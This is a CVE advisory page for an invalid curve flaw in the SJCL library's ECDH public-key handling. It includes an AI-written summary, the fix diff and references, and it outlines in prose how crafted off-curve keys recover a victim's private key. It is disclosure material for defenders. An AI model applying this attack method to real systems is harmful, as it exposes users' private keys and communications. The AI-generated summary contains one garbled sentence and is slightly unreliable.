CVE-2026-4258
Description
All versions of the package sjcl are vulnerable to Improper Verification of Cryptographic Signature due to missing point-on-curve validation in sjcl.ecc.basicKey.publicKey(). An attacker can recover a victim's ECDH private key by sending crafted off-curve public keys and observing ECDH outputs. The dhJavaEc() function directly returns the raw x-coordinate of the scalar multiplication result (no hashing), providing a plaintext oracle without requiring any decryption feedback.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SJCL (all versions with ECC support) lacks point-on-curve validation in publicKey(), enabling an invalid curve attack that recovers ECDH private keys via crafted off-curve public keys.
Vulnerability
Overview
The Stanford Javascript Crypto Library (SJCL) package sjcl (versions 1.0.0 through 1.0.8 with ECC support) is vulnerable to an invalid curve attack due to missing point-on-curve validation in the sjcl.ecc.basicKey.publicKey() constructor [1][2]. When a sjcl.ecc.point object is passed directly (rather than a bit array), the constructor stores it without calling isValid(), bypassing the curve membership check that is performed in the fromBits() path [2][3]. This allows an attacker to supply a crafted public key that lies on a different, weaker curve (or no curve at all), which the victim's ECDH implementation will accept and use in scalar multiplication.
Attack
Vector and Exploitation
An active attacker can send a series of specially crafted off-curve public keys to a victim using SJCL's ECDH functions. The victim's dh() or dhJavaEc() methods perform scalar multiplication on the attacker-supplied point using the victim's private key [2]. Critically, dhJavaEc() directly returns the raw x-coordinate of the resulting point without any hashing or additional processing, effectively providing a plaintext oracle [1][2]. No decryption feedback or additional oracle is required; the attacker can observe the raw output of each ECDH exchange. By selecting points with small subgroups on related curves, the attacker can recover the victim's private key bit by bit through a series of such exchanges.
Impact
Successful exploitation allows an attacker to recover the victim's full ECDH private key [1][2]. With the attacker can then decrypt any past or future ECDH-encrypted communications that rely on that key, leading to a complete compromise of confidentiality for sessions protected by the affected SJCL ECDH implementation. The CVSS 3.1 base score is 5.9 (Medium) under the standard assessment, but the direct oracle nature of dhJavaEc() could justify a higher score of 7.5 (High) [2].
Mitigation
Status
The SJCL project has acknowledged the vulnerability and released version 1.0.9, which fixes the missing point-on-curve validation [4]. Users are strongly advised to upgrade to SJCL 1.0.9 or later. The project is deprecated and recommends against using SJCL in new projects; users should consider modern alternatives [4]. No workaround is available for versions prior to 1.0.9.
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
sjclnpm | < 1.0.9 | 1.0.9 |
Affected products
2- sjcl/sjcldescription
Patches
1ee3074599724fix a vulnerability to invalid curve attacks
2 files changed · +7 −1
core/ecc.js+4 −0 modified@@ -460,6 +460,10 @@ sjcl.ecc.basicKey = { this._point = point; } + if (!this._point.isValid()) { + throw new sjcl.exception.corrupt("not on the curve!"); + } + this.serialize = function () { var curveName = sjcl.ecc.curveName(curve); return {
README.md+3 −1 modified@@ -3,7 +3,7 @@ Deprecation status ==== -Having not been updated in many years, sjcl is deprecated. Please do not use it in new projects, and consider instead a more modern alternative. +Having not been updated in many years (except to fix one serious vulnerability, described below), sjcl is deprecated. Please do not use it in new projects, and consider instead a more modern alternative. [](https://travis-ci.org/bitwiseshiftleft/sjcl) @@ -16,6 +16,8 @@ Security Advisories * 12.02.2014: the current development version has a paranoia bug in the ecc module. The bug was introduced in commit [ac0b3fe0](https://github.com/bitwiseshiftleft/sjcl/commit/ac0b3fe0) and might affect ecc key generation on platforms without a platform random number generator. +* 03.08.2026: According to https://gist.github.com/Kr0emer/2560f98edb10b0b34f2438cd63913c47, sjcl is vulnerable due to missing point-on-curve validation in `sjcl.ecc.basicKey.publicKey()`. An attacker can recover a victim's ECDH private key by sending crafted off-curve public keys and observing ECDH outputs. The `dhJavaEc()` function directly returns the raw x-coordinate of the scalar multiplication result (no hashing), providing a plaintext oracle without requiring any decryption feedback. This bug is fixed in SJCL 1.0.9. Thanks to Kr0emer for reporting it, and to the the Snyk security team for relaying this information. + Security Contact ==== Security Mail: sjcl@ovt.me
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
7- github.com/advisories/GHSA-2w8x-224x-785mghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2026-4258ghsaADVISORY
- gist.github.com/Kr0emer/2560f98edb10b0b34f2438cd63913c47ghsaWEB
- github.com/bitwiseshiftleft/sjcl/blob/master/core/ecc.jsghsaWEB
- github.com/bitwiseshiftleft/sjcl/commit/ee307459972442a17beebc29dc331fffd8aff796ghsaWEB
- security.snyk.io/vuln/SNYK-JS-SJCL-15369617ghsaWEB
- github.com/bitwiseshiftleft/sjcl/blob/master/core/ecc.js%23L454-L461mitre
News mentions
0No linked articles in our index yet.